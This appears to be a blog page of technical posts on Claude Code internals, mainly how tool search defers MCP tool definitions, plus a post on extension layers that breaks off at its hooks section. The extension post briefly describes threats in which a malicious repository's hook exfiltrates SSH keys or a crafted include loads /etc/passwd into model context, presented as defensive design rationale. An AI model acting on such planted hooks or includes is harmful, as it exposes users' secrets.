Each layer assumes the others might fail. The token lifecycle assumes ptrace might not be blockable. The CA download assumes the endpoint might be down. The relay assumes TCP packets might be coalesced. The protobuf encoder assumes payloads might exceed buffer caps. And the entire system assumes it might not initialize at all — in which case, the session works normally without proxy capabilities, and the debug log explains why.

How Tool Search Defers Tools to Save Tokens

Laurent DeSegur — Wed, 08 Apr 2026 21:10:03 +0000

Claude Code can use dozens of built-in tools and an unlimited number of MCP tools. Every tool the model might call needs a definition — a name, description, and JSON schema — sent with each API request. A single MCP tool definition might cost 200–800 tokens. Connect three MCP servers with 50 tools each, and you're burning 60,000 tokens on tool definitions alone. Every turn. Before the model reads a single message.

That's not sustainable. A 200K context window that loses 30% to tool definitions before the conversation starts is a bad experience. The model has less room to think, compaction triggers sooner, and cost per turn climbs.

The naive solution is obvious: don't send tools the model doesn't need. But which tools does the model need? You don't know until it tries to use one. And if the tool definition isn't there when the model tries to call it, the call fails.

Claude Code solves this with a system called tool search. When MCP tool definitions exceed a token threshold, most tools are deferred — their definitions are withheld from the API request. In their place, the model gets a single ToolSearch tool it can invoke to discover and load tools on demand. The API receives a tool_reference content block in the search result, expands it to the full definition, and the model can call the tool on its next turn.

Consider the concrete flow. A user has configured MCP servers for GitHub, Slack, and Jira — 147 tools total. Without tool search, every API call sends 147 tool definitions: ~90,000 tokens. With tool search, the API call sends ~25 built-in tool definitions plus ToolSearch itself: ~15,000 tokens. The model's prompt tells it "147 deferred tools are available — use ToolSearch to load them." When the model needs to create a GitHub issue, it calls ToolSearch({ query: "github create issue" }). The system returns a tool_reference for mcp__github__create_issue. On the next turn, that tool's full schema is available, and the model calls it normally. Total overhead for this discovery: one extra turn, ~200 tokens. Savings over a 20-turn conversation: ~1.5 million tokens.

This article traces the entire pipeline: the deferral decision, the threshold calculation, the search algorithm, the discovery loop across turns, and the snapshot mechanism that preserves discovered tools across context compaction. Every layer is designed around the same principle: fail closed, fail toward asking. If anything is uncertain — an unknown model, a proxy gateway, a missing token count — the system falls back to loading all tools, never to silently hiding them.

The Deferral Decision

Not every tool can be deferred. The model needs certain tools on turn one, before it has a chance to search for anything. The deferral decision is a priority-ordered checklist:

function isDeferredTool(tool):
    # Explicit opt-out: MCP tools can declare they must always load
    if tool.alwaysLoad is true:
        return false

    # MCP tools are deferred by default (workflow-specific, often numerous)
    if tool.isMcp is true:
        return true

    # ToolSearch itself is never deferred — it's the bootstrap
    if tool.name is "ToolSearch":
        return false

    # Core communication tools are never deferred
    # (Agent, Brief — model needs these immediately)
    if tool is a critical communication channel:
        return false

    # Everything else: defer only if explicitly marked
    return tool.shouldDefer is true

The alwaysLoad opt-out is the escape hatch. An MCP server can set _meta['anthropic/alwaysLoad'] on a tool to force it into every API request regardless of deferral mode. This handles tools like a primary database query tool that the model will need on nearly every turn.

Notice the ordering. alwaysLoad is checked before the MCP check. This means an MCP tool can opt out of deferral even though MCP tools are deferred by default. And ToolSearch is checked after the MCP check, which means if someone wraps ToolSearch in an MCP server (don't), it still won't be deferred. The checklist is a priority chain where each rule can only override the ones below it.

The shouldDefer flag at the bottom is for built-in tools that want to participate in deferral without being MCP tools. Currently this isn't widely used, but it exists as an extension point — a built-in tool could mark itself as deferrable if it's rarely needed and expensive to describe.

Three Modes

The deferral system operates in one of three modes, controlled by an environment variable:

function getToolSearchMode():
    # Kill switch: if all beta features are disabled, never defer
    if DISABLE_EXPERIMENTAL_BETAS:
        return "standard"

    value = env.ENABLE_TOOL_SEARCH

    # Explicit "always defer" mode
    if value is truthy or value is "auto:0":
        return "tst"

    # Threshold-based: only defer when tools exceed a token budget
    if value is "auto" or value is "auto:N" where 1 <= N <= 99:
        return "tst-auto"

    # Explicit disable
    if value is falsy:
        return "standard"

    # Default: always defer MCP and shouldDefer tools
    return "tst"

The default mode is tst — always defer. This is the right default because any user with MCP tools has already accepted the latency of an extra search turn in exchange for a larger effective context window. The tst-auto mode provides a middle ground: defer only when the token cost actually justifies it.

The Threshold Calculation

In tst-auto mode, the system measures how many tokens the deferred tools would consume and compares against a budget:

threshold = floor(contextWindow * percentage / 100)
# Default percentage: 10%
# For a 200K context model: threshold = 20,000 tokens

The token count comes from the API's countTokens endpoint when available. The system serializes each deferred tool into its API schema (name + description + JSON schema), sends them to the counting endpoint, and caches the result keyed by the tool name set. The cache invalidates when MCP servers connect or disconnect, changing the tool pool.

There's a subtlety in the counting. The API adds a fixed preamble (~500 tokens) whenever tools are present in a request. When counting tools individually, each count includes this overhead, so counting N tools individually would report N × 500 tokens of phantom overhead. The system subtracts this constant from the total:

rawCount = countTokensViaAPI(deferredToolSchemas)
adjustedCount = max(0, rawCount - 500)

When the token counting API is unavailable — perhaps the provider doesn't support it, or the network request fails — the system falls back to a character-based heuristic. It sums the character lengths of each tool's name, description, and serialized input schema, then converts using a ratio of 2.5 characters per token:

charThreshold = floor(tokenThreshold * 2.5)
totalChars = sum(tool.name.length + tool.description.length + tool.schema.length
                 for each deferred tool)
enabled = totalChars >= charThreshold

This heuristic is intentionally conservative. Tool definitions are schema-heavy (lots of short keys and structural characters), which tokenize at a higher density than natural language. A 2.5 chars/token ratio slightly overestimates the token count, biasing toward enabling deferral — the safe direction.

The Search Mechanism

When tool search is enabled, the model sees a ToolSearch tool in its tool list. The tool accepts a query string and returns up to 5 results (configurable). There are two query modes.

Direct Selection

The model can request specific tools by name:

ToolSearch({ query: "select:mcp__github__create_issue" })
ToolSearch({ query: "select:Read,Edit,Grep" })  # comma-separated

Direct selection is a lookup, not a search. For each requested name, the system checks the deferred tool pool first, then falls back to the full tool set. Finding a tool in the full set that isn't deferred is a no-op — the tool is already loaded — but returning it prevents the model from retrying in a loop.

Why does the fallback to the full tool set matter? After context compaction or in subagent conversations, the model sometimes tries to "select" a tool it previously used, not realizing the tool is already loaded (because its earlier search result was summarized away). Without the full-set fallback, the select would fail, the model would get "no matching deferred tools found," and it would waste a turn figuring out the tool is already available. The fallback makes this a silent success.

Keyword Search

When the model doesn't know the exact tool name, it searches by keyword:

ToolSearch({ query: "slack send message" })
ToolSearch({ query: "+github pull request" })  # + requires term

The search algorithm scores each deferred tool against the query terms:

function scoreToolForQuery(tool, terms):
    parts = parseToolName(tool.name)
    # "mcp__slack__send_message" -> parts: ["slack", "send", "message"]
    # "NotebookEdit" -> parts: ["notebook", "edit"]

    score = 0
    for term in terms:
        # Exact part match (highest signal)
        if term in parts:
            score += 12 if tool.isMcp else 10

        # Substring match within a part
        elif any(term in part for part in parts):
            score += 6 if tool.isMcp else 5

        # Full name fallback
        elif term in fullName and score is 0:
            score += 3

        # searchHint match (curated capability phrase)
        if wordBoundaryMatch(term, tool.searchHint):
            score += 4

        # Description match (lowest signal, most noise)
        if wordBoundaryMatch(term, tool.description):
            score += 2

    return score

MCP tools get slightly higher weight on exact matches (12 vs 10) and substring matches (6 vs 5). This is deliberate: when tool search is active, most deferred tools are MCP tools. Boosting their scores ensures they rank above built-in tools that happen to share terminology.

The searchHint field is a curated string that tools can provide to improve discoverability. It's weighted above description matches (4 vs 2) because it's intentional signal — a tool author explicitly saying "this tool handles X" — rather than incidental keyword overlap in a long description.

Description matching uses word-boundary regex (\bterm\b) to avoid false positives. Without boundaries, a search for "read" would match every tool whose description contains "already", "thread", or "spreadsheet".

There's also a required-term mechanism. Prefixing a term with + makes it mandatory: only tools matching ALL required terms in their name, description, or search hint are scored. This lets the model narrow results when a server has many tools: +slack send finds tools with "slack" in the name AND ranks them by "send" relevance.

A Concrete Scoring Example

Suppose the deferred pool contains these tools:

mcp__slack__send_message        (MCP)
mcp__slack__list_channels       (MCP)
mcp__github__create_issue       (MCP)
mcp__email__send_email          (MCP)

The model searches: ToolSearch({ query: "slack send" }). Here's the scoring:

mcp__slack__send_message:
  parts = ["slack", "send", "message"]
  "slack": exact part match, MCP → +12
  "send":  exact part match, MCP → +12
  Total: 24

mcp__slack__list_channels:
  parts = ["slack", "list", "channels"]
  "slack": exact part match, MCP → +12
  "send":  no match in parts, no match in name → +0
  Total: 12

mcp__email__send_email:
  parts = ["email", "send", "email"]
  "slack": no match → +0
  "send":  exact part match, MCP → +12
  Total: 12

mcp__github__create_issue:
  parts = ["github", "create", "issue"]
  "slack": no match → +0
  "send":  no match → +0
  Total: 0

Result: ["mcp__slack__send_message", "mcp__slack__list_channels", "mcp__email__send_email"]. The Slack send tool wins, the other Slack tool ties with the email send tool, and the GitHub tool is excluded. Note how multi-term queries naturally boost tools that match on multiple dimensions — a tool matching both "slack" AND "send" scores 24, while one matching only "slack" scores 12.

The regex patterns are pre-compiled once per search to avoid creating them inside the hot loop (N tools × M terms × 2 checks). Each unique term gets one compiled regex, and all tools share them.

The MCP Prefix Fast Path

When the query starts with mcp__, the system checks for prefix matches before falling through to keyword search:

if query starts with "mcp__":
    matches = tools where name starts with query
    if matches found:
        return first maxResults matches

This handles the common pattern where the model knows the server name but not the specific action. Searching mcp__github returns all GitHub MCP tools without keyword scoring.

What Search Returns

The search doesn't return tool definitions. It returns tool_reference content blocks:

# Tool result sent back to the API:
{
    type: "tool_result",
    tool_use_id: "...",
    content: [
        { type: "tool_reference", tool_name: "mcp__github__create_issue" },
        { type: "tool_reference", tool_name: "mcp__github__list_issues" }
    ]
}

This is a beta API feature. The API server receives the tool_reference block and expands it into the full tool definition in the model's context. The client never sends the definition itself — the API resolves the reference from the deferred schemas that were sent with defer_loading: true.

This is the key insight of the architecture. The client marks deferred tools with defer_loading: true in their schema, telling the API "here's the definition, but don't show it to the model unless referenced." The tool_reference block is the trigger that expands a deferred definition. The model sees the full schema in its context only after a successful search.

Why not just return the full tool definition in the search result? Two reasons. First, the API handles the injection into the model's tool context — the client doesn't need to construct a new API request with the tool added. Second, tool_reference is a structured content block that the API validates against the known deferred schemas. The client can't fabricate a tool definition in a tool_result and have it treated as a callable tool. The API is the authority on which tools exist.

The Two-Layer Gate

For tool search to actually engage, two checks must pass:

Optimistic check (fast, stateless): Can tool search possibly be enabled? This runs early — during tool pool assembly — to decide whether ToolSearch itself should be included in the tool list. It checks mode and proxy gateway, but NOT model or threshold. This is called "optimistic" because it says "yes" even if the definitive check might say "no" later.

Definitive check (async, contextual): Should tool search be used for this specific API request? This runs at request time with the full context: model name, tool list, token counts. It checks model support, ToolSearch availability, and (for tst-auto) the threshold.

The two-layer design avoids a chicken-and-egg problem. You can't check the definitive gate until you've assembled the tool pool. But the tool pool includes ToolSearch. If ToolSearch isn't in the pool, the definitive check will say "ToolSearch unavailable, disable." So the optimistic check decides whether to include ToolSearch, and the definitive check decides whether to use it.

The Discovery Loop

Tool search creates a multi-turn protocol. On turn 1, the model sees only non-deferred tools plus ToolSearch. It calls ToolSearch. On turn 2, the discovered tools are available. But how does the system know which tools to include on turn 2?

Scanning Message History

Before each API request, the system scans the conversation history for tool_reference blocks:

function extractDiscoveredToolNames(messages):
    discovered = empty set

    for message in messages:
        # Compact boundaries carry a snapshot (explained later)
        if message is compact_boundary:
            for name in message.metadata.preCompactDiscoveredTools:
                discovered.add(name)
            continue

        # tool_reference blocks only appear in user messages
        # (tool_result is a user-role message in the API)
        if message is not user:
            continue

        for block in message.content:
            if block is tool_result with array content:
                for item in block.content:
                    if item.type is "tool_reference":
                        discovered.add(item.tool_name)

    return discovered

The extracted set determines which deferred tools to include in the next request:

function filterToolsForRequest(tools, deferredToolNames, discoveredToolNames):
    return tools where:
        # Always include non-deferred tools
        tool.name not in deferredToolNames
        # Always include ToolSearch itself
        OR tool.name is "ToolSearch"
        # Include deferred tools that have been discovered
        OR tool.name in discoveredToolNames

This creates an accumulating set. Once a tool is discovered via search, it stays available for the rest of the conversation. The model never needs to re-search for a tool it's already found.

There's an important detail in what gets sent to toolToAPISchema. The filtering controls which tools appear in the API's tool array. But the ToolSearch prompt — which lists available deferred tools for the model to see — is generated from the full tool list, not the filtered one. This separation ensures the model can always search the complete pool, even though only discovered tools have their schemas sent.

A Complete Round-Trip

Let's trace a single discovery end-to-end:

Turn 1: User says "Create a GitHub issue for this bug."

System computes deferred set: 147 MCP tools.
System scans history: no tool_reference blocks yet.
Filtered tools: 25 built-in + ToolSearch. 147 deferred sent with defer_loading: true.
Model sees 26 tools. It knows it needs GitHub. It calls ToolSearch.

Turn 1 response: Model generates tool_use for ToolSearch with query "select:mcp__github__create_issue".

Turn 1 result: System looks up the name, finds it in deferred pool. Returns:

{ type: "tool_result", content: [
    { type: "tool_reference", tool_name: "mcp__github__create_issue" }
]}

Turn 2: System prepares next API request.

Scans history: finds tool_reference for mcp__github__create_issue.
Filtered tools: 25 built-in + ToolSearch + mcp__github__create_issue.
Model sees 27 tools. mcp__github__create_issue has full schema. Model calls it.

The discovery cost was one turn and ~200 tokens. The savings persist for the rest of the conversation — mcp__github__create_issue stays in the filtered set.

The defer_loading Flag

Each tool that passes through the filter gets serialized into an API schema. Deferred tools — those in deferredToolNames — get an extra field:

schema = {
    name: tool.name,
    description: tool.description,
    input_schema: tool.jsonSchema,
    defer_loading: true   # <-- tells API: definition present but hidden
}

The defer_loading flag is the contract between client and API. It says: "I'm sending you this tool's definition so you can expand tool_reference blocks that name it, but don't include it in the model's visible tool list unless a reference triggers it."

Without this flag, sending a tool definition means the model sees it. With it, the definition is staged but invisible until referenced. This is what makes the system work — the API has all the information it needs to expand references without the client re-sending definitions on demand.

Announcing Available Tools

The model needs to know what tools it can search for. There are two mechanisms for this, gated by a feature flag:

Pre-message approach (original): Before the conversation messages, the system prepends a user message listing all deferred tool names:

<available-deferred-tools>
mcp__github__create_issue
mcp__github__list_issues
mcp__slack__send_message
...
</available-deferred-tools>

Delta attachment approach (newer): Instead of prepending the full list every turn, the system computes a diff against what's already been announced:

function getDeferredToolsDelta(tools, messages):
    # Scan prior attachment messages for previous announcements
    announced = empty set
    for message in messages:
        if message is attachment of type "deferred_tools_delta":
            for name in message.addedNames: announced.add(name)
            for name in message.removedNames: announced.delete(name)

    deferred = tools where isDeferredTool(tool)
    deferredNames = names of deferred tools
    poolNames = names of all tools

    added = deferred tools not yet announced
    removed = announced tools no longer in the pool AND no longer in base tools
    # Note: a tool that was deferred but is now loaded (undeferred) is NOT
    # reported as removed — it's still available, just loaded differently

    if no changes: return null
    return { addedNames, removedNames }

The delta approach has a critical advantage: it doesn't bust the prompt cache. The pre-message approach changes the first message whenever the tool pool changes (MCP server connects late, tools added/removed), which invalidates the cached prefix. Deltas are appended as attachment messages, leaving the prefix stable.

Surviving Compaction

Context compaction summarizes old messages to free space. But compaction destroys tool_reference blocks — the summary is plain text, not structured content. If the system can't find tool references after compaction, it thinks no tools have been discovered, and every deferred tool disappears from subsequent requests.

The Snapshot Mechanism

Before compaction runs, the system takes a snapshot of all discovered tools and stores it on the compact boundary marker:

function compact(messages):
    # Snapshot BEFORE summarizing
    discoveredTools = extractDiscoveredToolNames(messages)

    summary = summarize(messages)
    boundaryMarker = createBoundaryMessage(summary)

    if discoveredTools is not empty:
        boundaryMarker.metadata.preCompactDiscoveredTools =
            sorted(discoveredTools)

    return [boundaryMarker, ...remainingMessages]

This snapshot appears in three compaction paths: full compaction, partial compaction (which keeps recent messages intact), and session-memory compaction. All three perform the same snapshot.

After compaction, when extractDiscoveredToolNames scans the messages, it encounters the compact boundary marker first and reads the snapshot:

# Post-compaction message array:
[
    compact_boundary {
        metadata.preCompactDiscoveredTools: ["mcp__github__create_issue", ...]
    },
    ... remaining messages with tool_reference blocks ...
]

The scan merges the snapshot with any new references in remaining messages. The union is the full discovered set — nothing is lost.

Why This Works

The snapshot is idempotent. Multiple compactions each snapshot the accumulated set. If compaction A captures tools {X, Y} and the model later discovers Z, compaction B captures {X, Y, Z}. The set only grows.

Partial compaction scans all messages, not just the ones being summarized. This is deliberate — it's simpler than tracking which tools were referenced in which half, and set union is idempotent, so double-counting is harmless.

Edge Cases and Fail-Closed Design

Model Support

Not every model supports tool_reference content blocks. The system uses a negative list: models are assumed to support tool search unless they match a pattern in the unsupported list.

UNSUPPORTED_MODEL_PATTERNS = ["haiku"]

function modelSupportsToolReference(model):
    normalized = lowercase(model)
    for pattern in UNSUPPORTED_MODEL_PATTERNS:
        if pattern in normalized:
            return false
    return true   # new models work by default

This is a deliberate design choice. A positive list (allowlist) would require code changes for every new model. The negative list means new models inherit tool search support automatically. Only models known to lack the capability are excluded.

The unsupported pattern list can be updated remotely via feature flags, without shipping a new release. This handles the case where a new model launches without tool_reference support — the team adds it to the list, and all running instances pick it up.

Proxy Gateway Detection: A Two-Act Failure

This is a case where a real-world failure, a fix, and a failure of the fix shaped the final design.

Act 1: Users routing API calls through third-party proxy gateways (LiteLLM, corporate firewalls) started getting API 400 errors: "Messages content type tool_reference not supported." The proxy only accepted standard content types — text, image, tool_use, tool_result — and rejected the beta tool_reference blocks. Tool search worked fine with direct Anthropic API calls but broke through any intermediary.

Act 2: The fix was aggressive: detect non-Anthropic base URLs and disable tool search entirely. This stopped the 400 errors but created a new problem — users with compatible proxies (LiteLLM passthrough mode, Cloudflare AI Gateway) lost deferred tool loading. All their MCP tools loaded into the main context window every turn. For users with many MCP tools, this was a significant regression in context efficiency.

The final design balances both failures:

function isToolSearchEnabledOptimistic():
    if mode is "standard":
        return false

    # Proxy detection: first-party provider but non-Anthropic URL
    # Only triggers when ENABLE_TOOL_SEARCH is unset (default behavior)
    if ENABLE_TOOL_SEARCH is not set
       AND provider is "firstParty"
       AND baseURL is not a known Anthropic host:
        return false   # proxy would reject tool_reference blocks

    return true

The key insight is the ENABLE_TOOL_SEARCH is not set condition. When the environment variable is unset, the system assumes unknown proxies can't handle beta features. But setting any non-empty value — true, auto, auto:10 — tells the system "I know what I'm doing, my proxy supports this." The user takes explicit responsibility for their proxy's capabilities.

There's also a global kill switch: DISABLE_EXPERIMENTAL_BETAS forces standard mode regardless of other settings. When this is set, the system strips beta-specific fields from tool schemas before sending them to the API, ensuring no defer_loading or tool_reference reaches the wire. This was itself motivated by a separate failure: the kill switch originally didn't remove all beta headers, breaking LiteLLM-to-Bedrock proxies that rejected unknown beta flags.

Pending MCP Servers

MCP servers connect asynchronously. When a user starts Claude Code, some servers may still be initializing. If tool search is enabled but no deferred tools exist yet (because no servers have connected), the system normally disables tool search for that request — there's nothing to search.

But if MCP servers are pending, it keeps ToolSearch available:

if useToolSearch AND no deferred tools AND no pending MCP servers:
    useToolSearch = false   # nothing to search, save a tool slot

if useToolSearch AND no deferred tools AND pending MCP servers:
    # keep ToolSearch — tools will appear when servers connect

When the model calls ToolSearch and no tools match, the result includes the names of pending servers:

{
    matches: [],
    total_deferred_tools: 0,
    pending_mcp_servers: ["github", "slack"]
}

This tells the model "your search found nothing, but these servers are still connecting — try again shortly."

Cache Invalidation

Tool descriptions are memoized to avoid recomputing them on every search. But the deferred tool set can change mid-conversation (MCP server connects, tools added/removed). The cache key is the sorted, comma-joined list of deferred tool names. When the set changes, the cache clears:

function maybeInvalidateCache(deferredTools):
    currentKey = sorted(tool.name for tool in deferredTools).join(",")
    if currentKey != cachedKey:
        clearDescriptionCache()
        cachedKey = currentKey

The token count is also memoized with the same key scheme. This means connecting a new MCP server triggers one fresh token count and one fresh description computation, then subsequent searches reuse the cache.

Tool Search Disabled Mid-Conversation

If the model switches from a supported model (Sonnet) to an unsupported one (Haiku) mid-conversation, the message history may contain tool_reference blocks that the new model can't process. The system handles this by stripping tool-search artifacts:

if not useToolSearch:
    for message in apiMessages:
        if message is user:
            stripToolReferenceBlocks(message)
        if message is assistant:
            stripCallerField(message)   # tool_use caller metadata

This ensures the API never receives tool_reference blocks when the current model doesn't support them, even if a previous model generated them.

There's an additional stripping path for a subtler failure: MCP server disconnection. If a server disconnects mid-conversation, previously valid tool_reference blocks now point to tools that don't exist in the current pool. The API rejects these with "Tool reference not found in available tools." The normalization pipeline strips tool_reference blocks for tools that aren't in the current available set, even when tool search is otherwise enabled.

The Turn Boundary Problem

When the API server receives a tool_result containing tool_reference blocks, it expands them into a <functions> block — the same format used for tool definitions at the start of the prompt. This expansion happens server-side, and it creates an unexpected problem in the wire format.

The expanded <functions> block appears inline in the conversation. If the same user message that contains the tool_result also has text siblings (auto-memory reminders, skill instructions, etc.), those text blocks render as a second Human: turn segment immediately after the </functions> closing tag. This creates an anomalous pattern in the conversation structure: two consecutive human turns with a functions block in between.

The model learns this pattern. After seeing it several times in a conversation, it starts completing the pattern: when it encounters a bare tool result at the tail of the conversation (no text siblings), it emits the stop sequence instead of generating a meaningful response. The conversation just... stops. An A/B experiment with five arms confirmed the dose-response: more tool_reference messages with text siblings → higher stop-sequence rate.

Two mitigations work in concert:

Turn boundary injection: When a user message contains tool_reference blocks and no text siblings, the system injects a minimal text block ("Tool loaded.") as a sibling. This creates a clean Human: Tool loaded. turn boundary that prevents the model from seeing a bare functions block at the tail.

Sibling relocation: When a user message contains tool_reference blocks AND has text siblings (from auto-memory, attachments, etc.), the system moves those text blocks to the next user message that has tool_result content but NO tool_reference. This eliminates the anomalous two-human-turns pattern. If no valid target exists (the tool_reference message is near the end of the conversation), the siblings stay — that's safe because a tail ending in a human turn gets a proper assistant cue.

Schema-Not-Sent Recovery

Sometimes the model tries to call a deferred tool without first discovering it via ToolSearch. This happens when the model hallucinates having seen the tool's schema (perhaps from its training data) or when a prior discovery was lost to compaction. The call fails at input validation — the model sends parameters that don't match any known schema, because the schema was never sent.

The raw validation error ("expected object, received string") doesn't tell the model what went wrong. So the system checks: is this a deferred tool that wasn't in the discovered set? If yes, it appends a hint:

"This tool's schema was not sent to the API — it was not in the
discovered-tool set. Use ToolSearch to load it first:
ToolSearch({ query: 'select:<tool_name>' })"

This turns a confusing Zod error into an actionable instruction. The model reads the hint, calls ToolSearch, gets the schema, and retries — one extra turn instead of a conversation-ending failure.

Invisible by Design

ToolSearch calls never appear in the user's terminal output. The tool's renderToolUseMessage returns null and its userFacingName returns an empty string. In the message collapse system — which groups consecutive reads and searches into compact "Read 5 files" summaries — ToolSearch is classified as "absorbed silently": it joins a collapse group without incrementing any counter. The user sees "Read 3 files, searched 2 files" but the ToolSearch call that loaded the tool definitions is invisible.

This is deliberate. ToolSearch is infrastructure, not user-facing functionality. Showing "Searched for tools" in the output would be confusing — the user asked to create a GitHub issue, not to search for tools. The tool discovery is an implementation detail of how the model accesses MCP tools, and the UI hides it accordingly.

The Complete Pipeline

Here's the full sequence for a single API request:

Mode check: Determine if tool search is tst, tst-auto, or standard.
Model check: Verify the model supports tool_reference blocks. If not, disable.
Availability check: Confirm ToolSearch is in the tool pool (not disallowed).
Threshold check (tst-auto only): Count deferred tool tokens via API (or character heuristic fallback). Compare to floor(contextWindow × 10%).
Build deferred set: Mark each tool as deferred or not via the priority checklist.
Scan history: Extract discovered tool names from tool_reference blocks and compact boundary snapshots.
Filter tools: Include non-deferred tools, ToolSearch, and discovered deferred tools. Exclude undiscovered deferred tools.
Serialize schemas: Add defer_loading: true to deferred tools. Add beta header.
Announce pool: Prepend deferred tool list or compute delta attachment.
Send request: API receives full definitions with defer_loading, shows only non-deferred and discovered tools to the model.
Model searches: Calls ToolSearch with a query. Gets tool_reference blocks back.
Next turn: Step 6 finds the new references. Step 7 includes the discovered tools. The model can now call them.
Compaction: Before summarizing, snapshot discovered tools to boundary marker. After compaction, step 6 reads the snapshot.

Each step fails toward loading more tools, not fewer. Unknown model? Load everything. Token count unavailable? Use conservative heuristic. Proxy detected? Load everything unless explicitly opted in. The worst case is wasting tokens on tool definitions. The best case is saving 90% of tool definition tokens while maintaining full functionality through on-demand discovery.

The system turns an O(N) per-turn cost into O(1) for idle tools and O(k) for the k tools actually used in a conversation. For a user with 200 MCP tools who typically uses 5–10 per session, that's a 95% reduction in tool definition tokens — context space reclaimed for actual work.

Design Trade-offs

Every engineering decision in this system reflects a trade-off. Here are the ones worth understanding:

Deferral granularity: Why defer by tool, not by MCP server? Server-level deferral would mean discovering one tool loads all tools from that server. This is simpler but wasteful — a GitHub server might have 40 tools, and you only need 3. Tool-level deferral uses more search turns but saves more tokens. The scoring system mitigates the extra turns: a single keyword search for "github" returns the most relevant tools, not all 40.

Negative vs. positive model list: The unsupported model list (["haiku"]) means every new model gets tool search by default. The alternative — a positive list of supported models — would mean every new model launch requires a code update. The negative list risks sending tool_reference blocks to a model that can't handle them, but the API would return a clear error, and the feature flag system can add models to the unsupported list within minutes.

Token counting precision: The character-per-token heuristic (2.5) is intentionally imprecise. Why not always use the API's token counter? Because the counter requires a network round-trip that might fail or add latency. The heuristic runs instantly. And the cost of over-counting (deferring when unnecessary) is one extra search turn. The cost of under-counting (not deferring when needed) is 60,000 wasted tokens per turn. The asymmetry favors the conservative heuristic.

Cache key design: Both the description cache and token count cache use the sorted tool name list as key, not a hash. This means cache comparison is O(N) in the number of deferred tools, but N is typically <200 and the comparison runs once per API request. A hash would be O(1) but risks collisions, and debugging cache issues with hashed keys is harder than with readable name lists.

Snapshot vs. protection: Why snapshot discovered tools instead of protecting tool_reference messages from compaction? The snip compaction strategy does protect these messages, but full compaction summarizes everything. Protecting individual messages from full compaction would fragment the summary and reduce its quality. The snapshot approach lets compaction work normally and reconstructs the discovery state from metadata.

How Claude Code Extends Itself: Skills, Hooks, Agents, and MCP

Laurent DeSegur — Wed, 08 Apr 2026 03:06:40 +0000

The Problem

You want Claude Code to know your team's conventions, run your linter after every edit, delegate research to a background worker, and call your internal APIs through custom tools. These are four different extension problems, and the naive approach — one plugin system that does everything — fails because each problem has a fundamentally different trust profile.

Consider a team's coding conventions. These are passive instructions — text the model reads but never executes. They need no sandbox, no permissions, no isolation. Now consider a linter that runs after every file write. This is active code that executes on your machine in response to the model's actions. It needs a trust boundary: what if a malicious project's config file registers a hook that exfiltrates your SSH keys? Now consider a background research agent. It needs its own conversation, its own tool access, its own abort controller — but it must not silently approve dangerous operations. And a custom tool server? It's a separate process speaking a protocol, potentially remote, potentially untrusted.

One extension system can't handle all of these safely. Passive instructions with no execution risk get the same UX as remote tool servers that can exfiltrate data? That's either too permissive for tools or too restrictive for instructions.

The design principle is layered trust with fail-closed defaults. Each extension type gets exactly the trust boundary its threat model requires. Instructions are injected as text — no execution, no permissions needed. Hooks execute deterministic code — sandboxed, workspace-trust-gated, exit-code-based control flow. Agents get isolated conversations with scoped tool access — permission prompts bubble to the parent. Tool servers run out-of-process with namespaced capabilities and enterprise policy controls. Unknown extension types don't silently succeed — they don't exist.

This article traces six extension systems in execution order: CLAUDE.md (instructions), hooks (lifecycle callbacks), skills (reusable prompts), the tool pool (built-in + external), MCP (external tool servers), and agents (delegated execution). Each one exists because the others can't solve its problem safely.

Layer 1: CLAUDE.md — Instructions as Text

The Problem It Solves

Every project has conventions. "Use bun, not npm." "Always run tests before committing." "Never modify the migration files directly." These need to reach the model on every turn, survive context compaction, and compose across nested directories — without executing anything.

How Discovery Works

Imagine you're working in /home/alice/projects/myapp/src/components/. The system walks upward:

/home/alice/projects/myapp/src/components/
/home/alice/projects/myapp/src/
/home/alice/projects/myapp/
/home/alice/projects/
/home/alice/

At each directory, it looks for three things:

CLAUDE.md (checked-in project instructions)
.claude/CLAUDE.md (same, nested in config dir)
.claude/rules/*.md (individual rule files)

But not all directories are equal. The full discovery hierarchy has six tiers, loaded in order from lowest to highest priority:

1. Managed      — /etc/claude-code/CLAUDE.md (enterprise policy, always loaded)
2. User         — ~/.claude/CLAUDE.md (your personal global instructions)
3. Project      — CLAUDE.md files found walking up from cwd
4. Local        — CLAUDE.local.md (gitignored, private per-developer)
5. AutoMemory   — ~/.claude/projects/.../memory/MEMORY.md (persistent learning)
6. TeamMemory   — Shared team memory (experimental)

Priority matters because the model pays more attention to later content. Your project's "use bun" instruction at tier 3 takes precedence over a user-level "use npm" at tier 2. Enterprise policy at tier 1 is loaded first but can't be overridden by anything below it — it's structurally guaranteed to be present.

The Include System

A CLAUDE.md can reference other files:

# Project Rules
@./docs/coding-standards.md
@./docs/api-conventions.md

The @ directive pulls in external files as separate instruction entries. Resolution rules:

@./relative — relative to the including file's directory
@~/path — relative to home
@/absolute — absolute path

Circular includes are tracked by recording every processed path in a set. If file A includes B and B includes A, the second inclusion is silently skipped.

Security: only whitelisted text file extensions are loadable — over 100 extensions covering code, config, and documentation formats. Binary files (images, PDFs, executables) are rejected. This prevents a crafted include path from loading arbitrary binary data into the model's context.

Conditional Rules

Rule files can have frontmatter that restricts when they activate:

---
paths: src/api/**
---
Never use raw SQL queries in API handlers. Always use the query builder.

This rule only appears when the model is working on files matching src/api/**. The matching uses gitignore-style patterns — the same library that handles .gitignore, so glob semantics are consistent. Rules without a paths field apply unconditionally.

How Instructions Reach the Model

All discovered files are concatenated into a single block, wrapped in a system-reminder tag, and injected as part of a user message — not the system prompt. This is a deliberate choice: system prompt content is cached aggressively, but CLAUDE.md content can change between turns (the user might edit a file). By injecting it as user-message content, it gets re-read on every turn without invalidating the system prompt cache.

The instruction block carries a header that tells the model these instructions override default behavior — a prompt-level enforcement that complements the structural priority ordering.

Fail-Closed Properties

Unknown file extensions in @include → silently skipped (no binary loading)
File read errors (ENOENT, EACCES) → silently skipped (missing files don't crash)
Circular includes → tracked and deduplicated
Frontmatter parse errors → content loaded without conditional filtering (fail-open on conditions, fail-closed on content)
HTML comments → stripped (authorial notes don't reach the model)
AutoMemory → truncated after 200 lines (prevents unbounded context growth)

Trade-Off: Safety Over Convenience

External includes (files outside the project root) require explicit approval. A CLAUDE.md in a cloned repository can't silently @/etc/passwd to exfiltrate system files into the model's context. The user must approve external includes once per project — a one-time friction that prevents a class of supply-chain attacks where a malicious repo's instructions load sensitive files.

Layer 2: Hooks — Deterministic Lifecycle Callbacks

The Problem It Solves

You want to run your linter after every file write. You want to block the model from committing to main. You want to send a webhook when a session ends. These are deterministic actions — no LLM judgment needed — that execute in response to specific lifecycle events.

The Attack That Shaped the Design

